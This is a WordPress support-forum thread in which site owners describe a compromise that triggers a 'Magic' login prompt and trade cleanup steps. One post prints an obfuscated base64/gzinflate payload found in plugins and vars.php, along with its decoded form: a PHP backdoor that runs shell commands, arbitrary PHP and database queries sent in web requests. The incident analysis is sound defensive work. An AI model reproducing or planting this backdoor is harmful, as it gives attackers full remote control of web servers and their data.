Can’t post/edit: requesting authentication “magic”

This just started on one of my user’s sites. It looks like a hack to me. Has anyone gotten to the root of the problem?

I found that the WP sites could have been hacked using the Magic Shell script. You can find more information here:
https://iboughtamac.com/2008/03/28/protecting-wordpress-from-magic-include-shell/

Note that the information to remove the exploit is not the same in this case. Uploading a clean version of wp-includes/vars.php does fix it.

While doing the research to solve this, I found two extra files that had a similar script included (eval() of base64_decode()). They had been uploaded to a subdirectory on wp-content/uploads/ and were fonction.php and wp-links.php.

Good luck,

Tomi

Something for IT

The following code was found on my clients WP site in two separate plug-ins. Code was found at the top of each page (when you click the edit link for the plugin).

eval(gzinflate(base64_decode('1VVtT9swEP7c/gpTVSSRukGrMhgF1gk6aRL7AIwPCCbjJhfqLW/YzkoH/e87Oy9NCUPAJqRVbZr4Od89z53v0rxtNrhP7BU/jVzF44jCDZdK2hY1H8l8kBMIAstxmg00bhSG5J6B3f4Rh6lyiDZqDHnEqQCpYgF2SxvRMPag5QzqaJxARMdMgsdFbtD2uGTjAGgRTZJdwoRgMxqyxLaU4KHVIXCTBOjVtjr4oH1egbKt2l7knrk1SiFM1IwUdHO+BqrlIGFSqolILYesrpIVHlHDoQJ0SJ1q6bOxtjYk8ZhKxYSyMwoonhS7Cw6DwrqNOUGhZhNKoW4cKYiQycLEYBB51A2ARQUwN1cIJDyoQ86kgrCmIl9+kYZs7+sp0EcMn8Ctq1hAjyspuS123OMP7iQm2uxJnB5k8wQeQ1IJ3THxCgI5xe8xj+zWRdRaRkt6HaLBh0gOCZe6s+JUuGC3faM30R1Wxmthk1XLm8ds5f4a0wkPAPtkSHyIffSxMC6s32qvvgDmIdwh3fVev+BoSNo1tIDnZQ+4QSw1w1r9zc1yyS5vM/Lzy0cKpS/4m+NSNtO4lKCw0enx6Oh0dPL13EomCd3wun1vi3U3e5v9dX9zfWurv9Fj7tjbeLfudt/3rG+5XhOjtfOUPTrjaaD28qLo4M+OSnZ3iQU/GU7aLN363tY9FLIr7tLrNFYg6VXi2g65uyM1RKSR4iEg+oFIHJCJDBiedFml4oYe6iPbpLY2yLJnKkD+QkDWE0bA/RfE/6blOgUxK8S0sxLjYQxn8jqgBnw1STgHpok3frPnjSeVV1lOymmWHZMd2mecWfrl7OTokGKw4zP66ePnw9HBNsG5k6kEIWJhV2JXJ4/HUc2AFL23SPfSCMopVjjmTZ0NzLz986HTFvG0TLEPyp1QfFfG7rKb6nQ4x1oRvS2fBNlf7kAA5DJLB4NFmiQIzgL+KyPpVEUtafpX2T053d8fjQ6WEsx8H1wFHkUFeBSm40qiiV4jhcWf0m4UZ8Quop21F4yrQjJ6wu9v'))); ?>

I expanded the eval code. Here is what it expanded to:

{
        if (!function_exists('______safeshell'))
        {
                function ______safeshell($komut) {
                        @ini_restore("safe_mode");
                        @ini_restore("open_basedir");
                        $disable_functions = array_map('trim', explode(',', ini_get('disable_functions')));
                        if (!empty ($komut)) {
                                if (function_exists('passthru') && !in_array('passthru', $disable_functions)) {
                                        //@ ob_start();
                                        @ passthru($komut);
                                        //$res = @ ob_get_contents();
                                        //@ ob_end_clean();
                                }
                                elseif (function_exists('system') && !in_array('system', $disable_functions)) {
                                        //@ ob_start();
                                        @ system($komut);
                                        //$res = @ ob_get_contents();
                                        //@ ob_end_clean();
                                }
                                elseif (function_exists('shell_exec') && !in_array('shell_exec', $disable_functions)) {
                                        $res = @ shell_exec($komut);
                                        echo $res;
                                }
                                elseif (function_exists('exec') && !in_array('exec', $disable_functions)) {
                                        @ exec($komut, $res);
                                        $res = join("\n", $res);
                                        echo $res, "\n";
                                }
                                elseif (@ is_resource($f = @ popen($komut, "r"))) {
                                        //$res = "";
                                        while (!@ feof($f)) {
                                                //$res .= @ fread($f, 1024);
                                                echo(@ fread($f, 1024));
                                        }
                                        @ pclose($f);
                                }
                                else
                                {
                                        $res = <code>{$komut}</code>;
                                        echo $res;
                                }
                        }
                }
        };

        if (isset ($_REQUEST['php_5d14d8a172740f7088452acbd560c192'])) {
                echo "<php_5d14d8a172740f7088452acbd560c192_result>\n";
                if ($_REQUEST['php_5d14d8a172740f7088452acbd560c192'] == 'eval') {
                        eval(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);
                }
                else if ($_REQUEST['php_5d14d8a172740f7088452acbd560c192'] == 'exec') {
                        ______safeshell(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);
                }
                else if ($_REQUEST['php_5d14d8a172740f7088452acbd560c192'] == 'query') {
                        $result = mysql_query(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd'], $wpdb->dbh);
                        if (!$result)
                        {
                                echo "php_5d14d8a172740f7088452acbd560c192_result_MYSQL_QUERY_FAILED: ", mysql_error($wpdb->dbh), "\n";
                                die();
                        }
                        else if (is_resource($result))
                        {
                                $res = array();
                                while ($row = mysql_fetch_assoc($result))
                                {
                                        $res[] = $row;
                                };
                                mysql_free_result($result);
                                echo serialize($res);
                                die();
                        }
                        else
                        {
                                echo "php_5d14d8a172740f7088452acbd560c192_result_MYSQL_QUERY_SUCCEEDED: ", mysql_affected_rows($wbdb->dbh), " rows affected\n";
                                die();
                        }
                };
                echo "\n</php_5d14d8a172740f7088452acbd560c192_result>\n";
                die();
        };
};

Looks like it gives the ability to run shell commands and mysql DB queries via remote POST and GET requests.

code was also found in the file:

wp-includes/vars.php

removed the malicious code from the top of the file and no longer see the ‘Magic’ login prompt.

I had the same problem, uploaded the wp-includes/vars.php file, and got the site back.

I then upgraded to latest version, and removed the eval() ode from the top of one of my plugins.

Hopefully, I won’t be having any more problems from now on!

I hope people take the time to read all the way down to the bottom as it will save them a lot of time.
I just replaced the vars.php file as well and it’s all good.
Thanks to those who contributed and paved the way to a simple fix!
Now does anyone know WHY it happens, or do we care?

I am having the same issue. Can someone walk me through fixing it? Thanks.

qmagnets and all, thank you!

Replacing the vars.php file did the trick.

I would very much like to know why it happened, though. If anyone knows or has a guess, I’m all ears.

I had the same issues with getting the whole you must authenticate to enter the “MAGIC” area.

I replaced all of the root files, wp-admin, & wp-includes folder files with fresh copy of my 2.7.1 install and the issues went away.

with fresh copy of my 2.7.1 install and the issues went away

*sigh*

Upgrade to the latest version!

Don’t just push the door to with the hope the burglars won’t come back. Take down the flashing neon sign that says “PLEASE BURGLAR ME!”, close the door and lock it.

Alism, I can’t upgrade. Each time I do it asks for my user name and password then tells me it’s wrong. What do I do?

Hi,
Have the same problem. Uploaded original version of vars.php and it stopped the “Magic”pop up for login. It fixed the Magic issue but not the 403 error when trying to update and save template files. Permissions on the server are correct. Not sure what else to do.

I also found the code in 2 plugins, which I deleted but the template edit/save permission denial is still there.

Did anyone with the Magic issue also have a problem with saving updated templates?

To complicate matters, I had upgraded to 2.9 right after solving the Magic issue and need to correct the Page template which is showing the default and not the custom one.

Thanks!

I just re-uploaded the include files but it made no difference. I still can’t edit and save any templates.

Thanks for the info here. Just found in one of my client sites on updating. Code appears in the vars.php and 12 plug-ins. Using 2.7 on this site. What a mess. Does anyone know if 2.9 will solve this?